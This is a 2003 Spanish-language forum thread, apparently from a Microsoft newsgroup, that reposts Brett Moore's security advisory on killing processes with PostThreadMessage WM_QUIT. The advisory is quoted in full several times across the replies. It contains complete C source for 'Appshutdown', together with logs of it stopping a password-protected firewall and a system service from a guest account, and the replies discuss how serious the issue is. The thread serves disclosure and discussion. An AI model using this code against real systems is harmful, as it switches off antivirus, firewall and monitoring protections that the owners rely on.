[seguridad]. Potencialmente muy peligroso.

03/10/2003 - 15:58 por JM Tella Llop [MS MVP] · | Informe spam
= Process Killing - Playing with PostThreadMessage
= brett.moore@security-assessment.com
= http://www.security-assessment.com
= Originally posted: October 02, 2003

== Background =
While continuing our research into shatter attacks, we turned our
attention to the PostThreadMessage API.

(Start MSDN)
- The PostThreadMessage function places (posts) a message in the message
- queue of the specified thread and then returns without waiting for the
- thread to process the message.
-
- BOOL PostThreadMessage(
- DWORD idThread, // thread identifier
- UINT Msg, // message to post
- WPARAM wParam, // first message parameter
- LPARAM lParam // second message
-
- The function fails if the specified thread does not have a message queue.
- The system creates a thread's message queue when the thread makes its
- first call to one of the Win32 USER or GDI functions.
(End MSDN)

It appears from our testing that any thread running under any security
level will accept a WM_QUIT message, causing the process to terminate.

(Start MSDN)
- WM_QUIT
- The WM_QUIT message indicates a request to terminate an application and
- is generated when the application calls the PostQuitMessage function.
- Return Values
- This message does not have a return value, because it causes the message
- loop to terminate before the message is sent to the application's window
- procedure.
(End MSDN)

Similar results can also be seen in some cases through the use of sending
WM_DESTROY or WM_CLOSE messages.

While this does not have the security implications of 'privilege escalation'
attacks, it may cause some concerns under certain circumstances.

For our testing we used a personal firewall that runs as a service, and
requires a password before terminating. When run from a guest account
Appshutdown was able to kill the firewall service and various other windows
services.

This means that any user has the potential to shutdown;
* antivirus applications
* personal firewall applications
* filtering applications
* monitoring applications
* potentially critical system services.

The mitigating factor is that the thread is required to have a message
queue.

== Example Logs =
The test.exe process is the personal firewall that requires a password
before shutting down.

The following logs are shortened outputs of the tlist and kill commands
from the NTRK
-
C:\>tlist
208 WINLOGON.EXE NetDDE Agent
1020 test.exe TestFirewall
1132 mstask.exe SYSTEM AGENT COM WINDOW

C:\>kill 1020
process test.exe (1020) - 'TestFirewall' killed
C:\>kill 208
process WINLOGON.EXE (208) - 'NetDDE Agent' killed
-

Authough kill results in the messages above, what really happened was;
a) the password prompt appeared when trying to kill 1020
b) the service remained running when trying to kill 208

-
C:\>appshutdown "TestFirewall"
% AppShutdown - Playing with PostThreadMessage
% brett.moore@security-assessment.com

+ Finding TestFirewall Window...
+ Found Main Window At...0x30038h
+ Finding Window Thread..0x42ch Process 0x3fch
+ Send Quit Message
+ Done...
C:\>appshutdown "NetDDE Agent"
% AppShutdown - Playing with PostThreadMessage
% brett.moore@security-assessment.com

+ Finding NetDDE Agent Window...
+ Found Main Window At...0x10018h
+ Finding Window Thread..0x110h Process 0xd0h
+ Send Quit Message
+ Done...
-

AppShutdown managed to successfully shutdown both services;
a) bypassing the required password for the personal firewall
b) bypassing the security restrictions placed on shutting down services

== Example Code =
/************************************************************************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to;
* - shutdown any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
*************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd,proc;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage");
printf("%% brett.moore@security-assessment.com");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;

printf("+ Finding %s Window...",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failed");
return 0;
}
printf("0x%xh Process 0x%xh",hThread,proc);
printf("+ Send Quit Message");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...");
return 0;
}

== Example Vulnerable Programs =

From our testing, any process that implements a message queue is vulnerable


to been shutdown by a user of any security level. In some instances
bypassing shutdown password requirements.
This attack must be run through an interactive logon.

== Credit =
Brett Moore from security-assessment.com

== About Security-Assessment.com =
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

Jose Manuel Tella Llop
MS MVP - DTS
jmtella@compuserve.com

Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.

Preguntas similare

Leer las respuestas

#1 Ramón Sola [MS MVP]
04/10/2003 - 01:24 | Informe spam
Coñe... Ahora me estoy acordando del artículo ese titulado "Windows vulnerable por ser Windows"...
No creo que tenga muy buena solución, podrían existir cientos o miles de aplicaciones que dependan de esa "característica" para comunicar cierres, salidas y terminaciones bruscas a sus distintos componentes... Por ejemplo esas utilidades que permiten mandar cualquier mensaje de Windows a una ventana determinada, o incluso a todas (valor de "handle" HWND_BROADCAST)...
Ramón Sola / Málaga (España)
MS MVP (Windows - Shell/User) / http://mvp.support.microsoft.com

Arregla Windows antes de escribirme. ;-)))


JM Tella Llop [MS MVP] · escribió...
> = Process Killing - Playing with PostThreadMessage
> =
= http://www.security-assessment.com
> = Originally posted: October 02, 2003
>
== Background =>
While continuing our research into shatter attacks, we turned our
attention to the PostThreadMessage API.



[...]
Respuesta Responder a este mensaje
#2 José Manuel Agüero
04/10/2003 - 21:46 | Informe spam
Hola:

Bueno, es sabido que un programa que se ejecute en un equipo puede hacer mucho daño independientemente de esta función. Si no ejecutamos programas malignos, ¿cuál es el riesgo de seguridad de PostThreadMessage? Si ejecutamos programas malignos, ¿qué mas da? Un programa maligno puede hacer muchas más cosas.
Supongo que se refiere a la capacidad de cualquier virus de detener a los antivirus. Desde mi punto de vista los antivirus se pueden proteger fácilmente (o quizá no sé lo suficiente de programación) de este riesgo. De hecho es una de las primeras protecciones que yo habría puesto. A parte de los virus no veo cuál es la noticia...

Saludos.


"JM Tella Llop [MS MVP] ·" escribió en el mensaje news:
= Process Killing - Playing with PostThreadMessage
=
= http://www.security-assessment.com
= Originally posted: October 02, 2003

== Background =
While continuing our research into shatter attacks, we turned our
attention to the PostThreadMessage API.

(Start MSDN)
- The PostThreadMessage function places (posts) a message in the message
- queue of the specified thread and then returns without waiting for the
- thread to process the message.
-
- BOOL PostThreadMessage(
- DWORD idThread, // thread identifier
- UINT Msg, // message to post
- WPARAM wParam, // first message parameter
- LPARAM lParam // second message
-
- The function fails if the specified thread does not have a message queue.
- The system creates a thread's message queue when the thread makes its
- first call to one of the Win32 USER or GDI functions.
(End MSDN)

It appears from our testing that any thread running under any security
level will accept a WM_QUIT message, causing the process to terminate.

(Start MSDN)
- WM_QUIT
- The WM_QUIT message indicates a request to terminate an application and
- is generated when the application calls the PostQuitMessage function.
- Return Values
- This message does not have a return value, because it causes the message
- loop to terminate before the message is sent to the application's window
- procedure.
(End MSDN)

Similar results can also be seen in some cases through the use of sending
WM_DESTROY or WM_CLOSE messages.

While this does not have the security implications of 'privilege escalation'
attacks, it may cause some concerns under certain circumstances.

For our testing we used a personal firewall that runs as a service, and
requires a password before terminating. When run from a guest account
Appshutdown was able to kill the firewall service and various other windows
services.

This means that any user has the potential to shutdown;
* antivirus applications
* personal firewall applications
* filtering applications
* monitoring applications
* potentially critical system services.

The mitigating factor is that the thread is required to have a message
queue.

== Example Logs =
The test.exe process is the personal firewall that requires a password
before shutting down.

The following logs are shortened outputs of the tlist and kill commands
from the NTRK
-
C:\>tlist
208 WINLOGON.EXE NetDDE Agent
1020 test.exe TestFirewall
1132 mstask.exe SYSTEM AGENT COM WINDOW

C:\>kill 1020
process test.exe (1020) - 'TestFirewall' killed
C:\>kill 208
process WINLOGON.EXE (208) - 'NetDDE Agent' killed
-

Authough kill results in the messages above, what really happened was;
a) the password prompt appeared when trying to kill 1020
b) the service remained running when trying to kill 208

-
C:\>appshutdown "TestFirewall"
% AppShutdown - Playing with PostThreadMessage
%

+ Finding TestFirewall Window...
+ Found Main Window At...0x30038h
+ Finding Window Thread..0x42ch Process 0x3fch
+ Send Quit Message
+ Done...
C:\>appshutdown "NetDDE Agent"
% AppShutdown - Playing with PostThreadMessage
%

+ Finding NetDDE Agent Window...
+ Found Main Window At...0x10018h
+ Finding Window Thread..0x110h Process 0xd0h
+ Send Quit Message
+ Done...
-

AppShutdown managed to successfully shutdown both services;
a) bypassing the required password for the personal firewall
b) bypassing the security restrictions placed on shutting down services

== Example Code =
/************************************************************************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to;
* - shutdown any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
*************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd,proc;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage");
printf("%% ");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;

printf("+ Finding %s Window...",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failed");
return 0;
}
printf("0x%xh Process 0x%xh",hThread,proc);
printf("+ Send Quit Message");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...");
return 0;
}

== Example Vulnerable Programs =
From our testing, any process that implements a message queue is vulnerable


to been shutdown by a user of any security level. In some instances
bypassing shutdown password requirements.
This attack must be run through an interactive logon.

== Credit =
Brett Moore from security-assessment.com

== About Security-Assessment.com =
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.
Respuesta Responder a este mensaje
#3 José Manuel Agüero
04/10/2003 - 21:46 | Informe spam
Hola:

Bueno, es sabido que un programa que se ejecute en un equipo puede hacer mucho daño independientemente de esta función. Si no ejecutamos programas malignos, ¿cuál es el riesgo de seguridad de PostThreadMessage? Si ejecutamos programas malignos, ¿qué mas da? Un programa maligno puede hacer muchas más cosas.
Supongo que se refiere a la capacidad de cualquier virus de detener a los antivirus. Desde mi punto de vista los antivirus se pueden proteger fácilmente (o quizá no sé lo suficiente de programación) de este riesgo. De hecho es una de las primeras protecciones que yo habría puesto. A parte de los virus no veo cuál es la noticia...

Saludos.


"JM Tella Llop [MS MVP] ·" escribió en el mensaje news:
= Process Killing - Playing with PostThreadMessage
=
= http://www.security-assessment.com
= Originally posted: October 02, 2003

== Background =
While continuing our research into shatter attacks, we turned our
attention to the PostThreadMessage API.

(Start MSDN)
- The PostThreadMessage function places (posts) a message in the message
- queue of the specified thread and then returns without waiting for the
- thread to process the message.
-
- BOOL PostThreadMessage(
- DWORD idThread, // thread identifier
- UINT Msg, // message to post
- WPARAM wParam, // first message parameter
- LPARAM lParam // second message
-
- The function fails if the specified thread does not have a message queue.
- The system creates a thread's message queue when the thread makes its
- first call to one of the Win32 USER or GDI functions.
(End MSDN)

It appears from our testing that any thread running under any security
level will accept a WM_QUIT message, causing the process to terminate.

(Start MSDN)
- WM_QUIT
- The WM_QUIT message indicates a request to terminate an application and
- is generated when the application calls the PostQuitMessage function.
- Return Values
- This message does not have a return value, because it causes the message
- loop to terminate before the message is sent to the application's window
- procedure.
(End MSDN)

Similar results can also be seen in some cases through the use of sending
WM_DESTROY or WM_CLOSE messages.

While this does not have the security implications of 'privilege escalation'
attacks, it may cause some concerns under certain circumstances.

For our testing we used a personal firewall that runs as a service, and
requires a password before terminating. When run from a guest account
Appshutdown was able to kill the firewall service and various other windows
services.

This means that any user has the potential to shutdown;
* antivirus applications
* personal firewall applications
* filtering applications
* monitoring applications
* potentially critical system services.

The mitigating factor is that the thread is required to have a message
queue.

== Example Logs =
The test.exe process is the personal firewall that requires a password
before shutting down.

The following logs are shortened outputs of the tlist and kill commands
from the NTRK
-
C:\>tlist
208 WINLOGON.EXE NetDDE Agent
1020 test.exe TestFirewall
1132 mstask.exe SYSTEM AGENT COM WINDOW

C:\>kill 1020
process test.exe (1020) - 'TestFirewall' killed
C:\>kill 208
process WINLOGON.EXE (208) - 'NetDDE Agent' killed
-

Authough kill results in the messages above, what really happened was;
a) the password prompt appeared when trying to kill 1020
b) the service remained running when trying to kill 208

-
C:\>appshutdown "TestFirewall"
% AppShutdown - Playing with PostThreadMessage
%

+ Finding TestFirewall Window...
+ Found Main Window At...0x30038h
+ Finding Window Thread..0x42ch Process 0x3fch
+ Send Quit Message
+ Done...
C:\>appshutdown "NetDDE Agent"
% AppShutdown - Playing with PostThreadMessage
%

+ Finding NetDDE Agent Window...
+ Found Main Window At...0x10018h
+ Finding Window Thread..0x110h Process 0xd0h
+ Send Quit Message
+ Done...
-

AppShutdown managed to successfully shutdown both services;
a) bypassing the required password for the personal firewall
b) bypassing the security restrictions placed on shutting down services

== Example Code =
/************************************************************************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to;
* - shutdown any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
*************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd,proc;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage");
printf("%% ");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;

printf("+ Finding %s Window...",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failed");
return 0;
}
printf("0x%xh Process 0x%xh",hThread,proc);
printf("+ Send Quit Message");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...");
return 0;
}

== Example Vulnerable Programs =
From our testing, any process that implements a message queue is vulnerable


to been shutdown by a user of any security level. In some instances
bypassing shutdown password requirements.
This attack must be run through an interactive logon.

== Credit =
Brett Moore from security-assessment.com

== About Security-Assessment.com =
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.
Respuesta Responder a este mensaje
#4 JM Tella Llop [MS MVP] ·
04/10/2003 - 22:04 | Informe spam
Aparte de la posibilidad de hacer cualquier cosa (ese solo es un ejemplo) para la cual no tienes privilegios en local, y por tanto un usuario de tu maquina podría tomar el control.. el problema tambien reside en que virus desde una cuenta sin privilegios,.. tambien podrian hacer cualquier cosa.

Es importante el tema.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"José Manuel Agüero" <jmaguero, cliente de vodafone (es)> wrote in message news:u%
Hola:

Bueno, es sabido que un programa que se ejecute en un equipo puede hacer mucho daño independientemente de esta función. Si no ejecutamos programas malignos, ¿cuál es el riesgo de seguridad de PostThreadMessage? Si ejecutamos programas malignos, ¿qué mas da? Un programa maligno puede hacer muchas más cosas.
Supongo que se refiere a la capacidad de cualquier virus de detener a los antivirus. Desde mi punto de vista los antivirus se pueden proteger fácilmente (o quizá no sé lo suficiente de programación) de este riesgo. De hecho es una de las primeras protecciones que yo habría puesto. A parte de los virus no veo cuál es la noticia...

Saludos.


"JM Tella Llop [MS MVP] ·" escribió en el mensaje news:
= Process Killing - Playing with PostThreadMessage
=
= http://www.security-assessment.com
= Originally posted: October 02, 2003

== Background =
While continuing our research into shatter attacks, we turned our
attention to the PostThreadMessage API.

(Start MSDN)
- The PostThreadMessage function places (posts) a message in the message
- queue of the specified thread and then returns without waiting for the
- thread to process the message.
-
- BOOL PostThreadMessage(
- DWORD idThread, // thread identifier
- UINT Msg, // message to post
- WPARAM wParam, // first message parameter
- LPARAM lParam // second message
-
- The function fails if the specified thread does not have a message queue.
- The system creates a thread's message queue when the thread makes its
- first call to one of the Win32 USER or GDI functions.
(End MSDN)

It appears from our testing that any thread running under any security
level will accept a WM_QUIT message, causing the process to terminate.

(Start MSDN)
- WM_QUIT
- The WM_QUIT message indicates a request to terminate an application and
- is generated when the application calls the PostQuitMessage function.
- Return Values
- This message does not have a return value, because it causes the message
- loop to terminate before the message is sent to the application's window
- procedure.
(End MSDN)

Similar results can also be seen in some cases through the use of sending
WM_DESTROY or WM_CLOSE messages.

While this does not have the security implications of 'privilege escalation'
attacks, it may cause some concerns under certain circumstances.

For our testing we used a personal firewall that runs as a service, and
requires a password before terminating. When run from a guest account
Appshutdown was able to kill the firewall service and various other windows
services.

This means that any user has the potential to shutdown;
* antivirus applications
* personal firewall applications
* filtering applications
* monitoring applications
* potentially critical system services.

The mitigating factor is that the thread is required to have a message
queue.

== Example Logs =
The test.exe process is the personal firewall that requires a password
before shutting down.

The following logs are shortened outputs of the tlist and kill commands
from the NTRK
-
C:\>tlist
208 WINLOGON.EXE NetDDE Agent
1020 test.exe TestFirewall
1132 mstask.exe SYSTEM AGENT COM WINDOW

C:\>kill 1020
process test.exe (1020) - 'TestFirewall' killed
C:\>kill 208
process WINLOGON.EXE (208) - 'NetDDE Agent' killed
-

Authough kill results in the messages above, what really happened was;
a) the password prompt appeared when trying to kill 1020
b) the service remained running when trying to kill 208

-
C:\>appshutdown "TestFirewall"
% AppShutdown - Playing with PostThreadMessage
%

+ Finding TestFirewall Window...
+ Found Main Window At...0x30038h
+ Finding Window Thread..0x42ch Process 0x3fch
+ Send Quit Message
+ Done...
C:\>appshutdown "NetDDE Agent"
% AppShutdown - Playing with PostThreadMessage
%

+ Finding NetDDE Agent Window...
+ Found Main Window At...0x10018h
+ Finding Window Thread..0x110h Process 0xd0h
+ Send Quit Message
+ Done...
-

AppShutdown managed to successfully shutdown both services;
a) bypassing the required password for the personal firewall
b) bypassing the security restrictions placed on shutting down services

== Example Code =
/************************************************************************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to;
* - shutdown any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
*************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd,proc;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage");
printf("%% ");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;

printf("+ Finding %s Window...",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failed");
return 0;
}
printf("0x%xh Process 0x%xh",hThread,proc);
printf("+ Send Quit Message");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...");
return 0;
}

== Example Vulnerable Programs =
From our testing, any process that implements a message queue is vulnerable


to been shutdown by a user of any security level. In some instances
bypassing shutdown password requirements.
This attack must be run through an interactive logon.

== Credit =
Brett Moore from security-assessment.com

== About Security-Assessment.com =
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.
Respuesta Responder a este mensaje
#5 JM Tella Llop [MS MVP] ·
04/10/2003 - 22:04 | Informe spam
Aparte de la posibilidad de hacer cualquier cosa (ese solo es un ejemplo) para la cual no tienes privilegios en local, y por tanto un usuario de tu maquina podría tomar el control.. el problema tambien reside en que virus desde una cuenta sin privilegios,.. tambien podrian hacer cualquier cosa.

Es importante el tema.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.





"José Manuel Agüero" <jmaguero, cliente de vodafone (es)> wrote in message news:u%
Hola:

Bueno, es sabido que un programa que se ejecute en un equipo puede hacer mucho daño independientemente de esta función. Si no ejecutamos programas malignos, ¿cuál es el riesgo de seguridad de PostThreadMessage? Si ejecutamos programas malignos, ¿qué mas da? Un programa maligno puede hacer muchas más cosas.
Supongo que se refiere a la capacidad de cualquier virus de detener a los antivirus. Desde mi punto de vista los antivirus se pueden proteger fácilmente (o quizá no sé lo suficiente de programación) de este riesgo. De hecho es una de las primeras protecciones que yo habría puesto. A parte de los virus no veo cuál es la noticia...

Saludos.


"JM Tella Llop [MS MVP] ·" escribió en el mensaje news:
= Process Killing - Playing with PostThreadMessage
=
= http://www.security-assessment.com
= Originally posted: October 02, 2003

== Background =
While continuing our research into shatter attacks, we turned our
attention to the PostThreadMessage API.

(Start MSDN)
- The PostThreadMessage function places (posts) a message in the message
- queue of the specified thread and then returns without waiting for the
- thread to process the message.
-
- BOOL PostThreadMessage(
- DWORD idThread, // thread identifier
- UINT Msg, // message to post
- WPARAM wParam, // first message parameter
- LPARAM lParam // second message
-
- The function fails if the specified thread does not have a message queue.
- The system creates a thread's message queue when the thread makes its
- first call to one of the Win32 USER or GDI functions.
(End MSDN)

It appears from our testing that any thread running under any security
level will accept a WM_QUIT message, causing the process to terminate.

(Start MSDN)
- WM_QUIT
- The WM_QUIT message indicates a request to terminate an application and
- is generated when the application calls the PostQuitMessage function.
- Return Values
- This message does not have a return value, because it causes the message
- loop to terminate before the message is sent to the application's window
- procedure.
(End MSDN)

Similar results can also be seen in some cases through the use of sending
WM_DESTROY or WM_CLOSE messages.

While this does not have the security implications of 'privilege escalation'
attacks, it may cause some concerns under certain circumstances.

For our testing we used a personal firewall that runs as a service, and
requires a password before terminating. When run from a guest account
Appshutdown was able to kill the firewall service and various other windows
services.

This means that any user has the potential to shutdown;
* antivirus applications
* personal firewall applications
* filtering applications
* monitoring applications
* potentially critical system services.

The mitigating factor is that the thread is required to have a message
queue.

== Example Logs =
The test.exe process is the personal firewall that requires a password
before shutting down.

The following logs are shortened outputs of the tlist and kill commands
from the NTRK
-
C:\>tlist
208 WINLOGON.EXE NetDDE Agent
1020 test.exe TestFirewall
1132 mstask.exe SYSTEM AGENT COM WINDOW

C:\>kill 1020
process test.exe (1020) - 'TestFirewall' killed
C:\>kill 208
process WINLOGON.EXE (208) - 'NetDDE Agent' killed
-

Authough kill results in the messages above, what really happened was;
a) the password prompt appeared when trying to kill 1020
b) the service remained running when trying to kill 208

-
C:\>appshutdown "TestFirewall"
% AppShutdown - Playing with PostThreadMessage
%

+ Finding TestFirewall Window...
+ Found Main Window At...0x30038h
+ Finding Window Thread..0x42ch Process 0x3fch
+ Send Quit Message
+ Done...
C:\>appshutdown "NetDDE Agent"
% AppShutdown - Playing with PostThreadMessage
%

+ Finding NetDDE Agent Window...
+ Found Main Window At...0x10018h
+ Finding Window Thread..0x110h Process 0xd0h
+ Send Quit Message
+ Done...
-

AppShutdown managed to successfully shutdown both services;
a) bypassing the required password for the personal firewall
b) bypassing the security restrictions placed on shutting down services

== Example Code =
/************************************************************************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to;
* - shutdown any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
*************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd,proc;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage");
printf("%% ");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;

printf("+ Finding %s Window...",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failed");
return 0;
}
printf("0x%xh Process 0x%xh",hThread,proc);
printf("+ Send Quit Message");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...");
return 0;
}

== Example Vulnerable Programs =
From our testing, any process that implements a message queue is vulnerable


to been shutdown by a user of any security level. In some instances
bypassing shutdown password requirements.
This attack must be run through an interactive logon.

== Credit =
Brett Moore from security-assessment.com

== About Security-Assessment.com =
Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors products.

Jose Manuel Tella Llop
MS MVP - DTS


Este mensaje se proporciona "como está" sin garantías de ninguna clase, y no otorga ningún derecho.

This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use.
Respuesta Responder a este mensaje
Ads by Google
Help Hacer una preguntaSiguiente Respuesta Tengo una respuesta
Search Busqueda sugerida